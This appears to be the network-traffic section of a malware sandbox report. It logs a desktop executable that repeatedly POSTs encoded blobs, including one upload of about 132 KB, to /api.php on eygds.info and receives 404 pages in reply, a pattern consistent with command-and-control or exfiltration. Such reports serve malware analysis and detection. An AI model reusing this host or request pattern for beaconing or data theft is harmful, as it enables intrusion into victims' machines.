Dec 30, 2024 01:58:12.542114973 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:12 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http
Dec 30, 2024 01:58:12.542125940 CET	1236	IN	Data Raw: 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 Data Ascii: -equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your we
Dec 30, 2024 01:58:12.542251110 CET	279	IN	Data Raw: 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: t.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49850	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:11.856555939 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:58:12.209415913 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:58:12.425681114 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 38 3a 31 32 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:58:12 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:58:12.425693035 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:58:12.425703049 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49920	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:22.267096996 CET	278	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 320 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:58:22.615628004 CET	320	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHcPqAqPTU%2B6a7kR0VrGKTOfwk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umq
Dec 30, 2024 01:58:22.828799009 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:22.829364061 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:22 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:22.829397917 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:58:22.829408884 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49921	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:22.267119884 CET	278	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:58:22.615632057 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:58:22.815711975 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:22.815921068 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:22 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:22.815931082 CET	224	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" c
Dec 30, 2024 01:58:22.900146008 CET	1236	IN	Data Raw: 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 Data Ascii: ontent="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap
Dec 30, 2024 01:58:22.900158882 CET	92	IN	Data Raw: 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: cident that was not intentional.</p> </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49922	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:22.336937904 CET	281	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 132578 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:58:22.693833113 CET	12360	OUT	Data Raw: 70 3d 70 68 44 68 54 7a 34 6c 4b 64 71 69 49 61 55 69 41 71 4a 38 25 32 42 57 2f 4b 61 58 4b 50 5a 5a 6f 6e 73 79 4b 74 61 38 52 44 64 32 34 42 69 4c 7a 62 62 72 36 6e 47 6b 71 45 48 35 56 48 6f 4d 34 48 58 45 33 56 69 35 34 70 33 4f 77 4a 32 75 Data Ascii: p=phDhTz4lKdqiIaUiAqJ8%2BW/KaXKPZZonsyKta8RDd24BiLzbbr6nGkqEH5VHoM4HXE3Vi54p3OwJ2u7b1%2BuDbKYThHqXrdRyLAA7O%2B8ein9KOMH2ZCFo82RRtaIEBbsfP0YfRNNarEZc9oxWASh1iQjZ3pUh9yjMurmGJ5P3gl8S1YxwSnyegAQedvLEgjgOMA67lum/JMG87OCde36frctmOgvQnUovMamRRP%2BSS
Dec 30, 2024 01:58:22.698729038 CET	4944	OUT	Data Raw: 34 74 77 25 32 42 4f 6d 6b 6c 53 69 6f 31 41 4c 68 76 52 56 6c 62 47 6b 70 42 6d 54 77 74 61 43 38 49 65 2f 38 2f 69 35 66 49 78 6d 49 55 4a 45 47 48 39 4f 4c 45 45 66 50 77 4c 68 4e 79 69 57 6b 53 4b 70 42 52 68 6f 64 48 41 5a 4a 71 6d 6f 4b 70 Data Ascii: 4tw%2BOmklSio1ALhvRVlbGkpBmTwtaC8Ie/8/i5fIxmIUJEGH9OLEEfPwLhNyiWkSKpBRhodHAZJqmoKpyeOZh9Qs/I77DDz3gS9OKkzUUZp4183xPtUDK3I6/Q3hUgkmans4%2B%2BonzPTa%2BEoHwcVIrMjmg49Dh7QLus0Jr8mtQ1ct3nxpdVNCVhCWDte%2BFmgg3Bf5Ufcijs9zupdztMFQ/jwnEBazsj64ImMbQmh1C
Dec 30, 2024 01:58:22.698755980 CET	2472	OUT	Data Raw: 6b 33 54 74 51 50 74 66 68 67 54 46 54 37 7a 4c 70 41 74 33 56 66 69 46 42 47 68 70 6a 6d 4f 74 75 44 70 4d 49 47 50 42 73 49 70 4a 52 4f 2f 45 31 62 2f 6c 76 79 4d 62 45 4f 66 79 41 78 79 4d 34 63 54 78 6f 71 6b 79 59 39 59 65 36 30 33 73 50 33 Data Ascii: k3TtQPtfhgTFT7zLpAt3VfiFBGhpjmOtuDpMIGPBsIpJRO/E1b/lvyMbEOfyAxyM4cTxoqkyY9Ye603sP3apo9xgxXNWtcqFWNTrcgAELiCZ89h1rtD2608VBkiNYagrEtKSJ1ZfBboiroZTRZgJuw%2BHImqiMG8Nxmo5vb5F9Mbn5KEJqOMVNB23AIj52XdiskKE/e7wS6sgGRB5yH7/ekZh5oBwUFa8j4eUPwahkUaRnboJa
Dec 30, 2024 01:58:22.698781967 CET	2472	OUT	Data Raw: 37 37 49 46 79 6d 36 34 44 67 64 42 72 79 49 6c 47 4a 67 57 34 75 46 52 62 74 41 65 52 6e 49 64 39 30 68 56 7a 77 78 36 56 72 5a 41 37 65 44 43 72 59 64 25 32 42 25 32 42 44 65 6d 59 71 35 74 71 77 66 37 55 43 53 73 73 74 57 46 6c 35 37 30 39 6a Data Ascii: 77IFym64DgdBryIlGJgW4uFRbtAeRnId90hVzwx6VrZA7eDCrYd%2B%2BDemYq5tqwf7UCSsstWFl5709jn2FkDMNK1HvqgBbbhI1tJV1Q2p/vbAoucLZ7ACGo8wMgA3%2BhuQGSdQ5SmRmMZyvnEXgCfHavf3t9rKZ2bvFa9OCcohpBQqSwPaFW6jRtuGNE90uGoTh3W7oWPxMkONhJN38tSsRzEqaNob2/1InHpV9Ml6M%2Bx
Dec 30, 2024 01:58:22.698828936 CET	4944	OUT	Data Raw: 4f 46 62 70 6d 69 6c 79 42 76 44 73 4b 52 38 2f 51 79 58 35 52 2f 5a 62 4a 6c 53 7a 5a 41 6b 56 25 32 42 46 38 64 65 5a 6f 4a 37 64 42 6f 76 65 57 2f 53 51 72 25 32 42 67 49 51 33 39 75 65 67 6f 55 63 61 56 54 75 43 30 61 4b 57 48 33 56 59 51 44 Data Ascii: OFbpmilyBvDsKR8/QyX5R/ZbJlSzZAkV%2BF8deZoJ7dBoveW/SQr%2BgIQ39uegoUcaVTuC0aKWH3VYQDw4y2qlJuc%2ByDtCOJH/DAvgoSm1TTe3omvJbqDCzIe02E2nqwW0HB0DSCZp2PN%2BiyrxQRkIDCwzPybT4Hbtbo%2BphQZqJQuCLIz5ElhibxO/bUX/Jtz1uC91qNqk7cLeRss%2B3nm6WbAnmd1pGz5KOVqwgir
Dec 30, 2024 01:58:22.698940992 CET	9888	OUT	Data Raw: 76 61 57 45 36 44 75 68 4e 59 35 4a 77 67 59 30 59 53 54 77 43 55 36 73 4c 59 32 76 50 2f 5a 43 53 61 58 4a 38 74 4f 73 58 65 75 64 63 72 72 50 78 76 37 36 4b 6b 77 4d 49 4f 2f 68 6a 33 65 31 72 33 44 52 4d 69 74 4b 32 55 64 6b 63 76 7a 34 42 33 Data Ascii: vaWE6DuhNY5JwgY0YSTwCU6sLY2vP/ZCSaXJ8tOsXeudcrrPxv76KkwMIO/hj3e1r3DRMitK2Udkcvz4B34a4K4IAYa/LGG5544onxVhEAvPyTyR0Pq1oKjjAIaTQZ1KdDzo%2BrtCw%2B9jvnhTNFUfsaNUo9UK2FoVDHdbObGiP6MrfZg2/9ZixDKQrtAZjaTWR5wtTFhre80aO9fp3ptrQO20a3hIWuP1Cqby9pPGpiG6zFu
Dec 30, 2024 01:58:22.703605890 CET	7416	OUT	Data Raw: 43 76 59 61 45 53 72 4b 30 78 73 52 77 71 45 73 77 45 62 66 73 58 6b 36 76 43 46 55 58 4c 62 44 61 46 36 30 38 53 39 56 59 49 49 63 5a 44 4e 73 79 71 68 6b 35 6e 73 6c 32 6f 34 69 71 49 48 6a 54 36 4a 4f 59 5a 70 36 55 77 61 61 46 49 4e 32 6b 75 Data Ascii: CvYaESrK0xsRwqEswEbfsXk6vCFUXLbDaF608S9VYIIcZDNsyqhk5nsl2o4iqIHjT6JOYZp6UwaaFIN2kuRnUIB6x2rhaCjpeTq8IVRctsNMkfW/WdK2MEhNZyCkKNBkB/NWq67bO5GUQxqVOgOhhotgsrHrGk3J8O6CgdLcLPd0GjCPNCf/ebE7fpy7VTt0x9QzNQvJcM%2BeHMepPSsxuZ2dABxPmCBN41KeZNJ9TI1Sf9Ogu
Dec 30, 2024 01:58:22.703627110 CET	2472	OUT	Data Raw: 2f 71 72 52 6e 77 73 51 6f 6d 79 7a 36 72 2f 31 70 75 6a 44 62 32 4c 34 79 47 34 69 4e 47 46 44 72 45 37 43 74 4b 71 33 6c 58 41 25 32 42 74 49 78 66 6e 66 38 64 58 30 75 72 61 6a 41 37 69 61 45 56 4c 47 68 75 34 30 72 78 4d 71 78 78 56 38 36 66 Data Ascii: /qrRnwsQomyz6r/1pujDb2L4yG4iNGFDrE7CtKq3lXA%2BtIxfnf8dX0urajA7iaEVLGhu40rxMqxxV86fJ6AnVMDST37BnJF1KUyaPgc59i3oHBuIxJALV06cbj4HOfYt6BwbiMSQC1dOnG4%2BBzn2LegcG4jEkAtXTpxuPgc59i3oHBvPaH7bYehv1hf1OVQqgO2Xkaq4yiF7vaXe9whtq1rCnNy0YR9/D3ws581e8OWuWNH
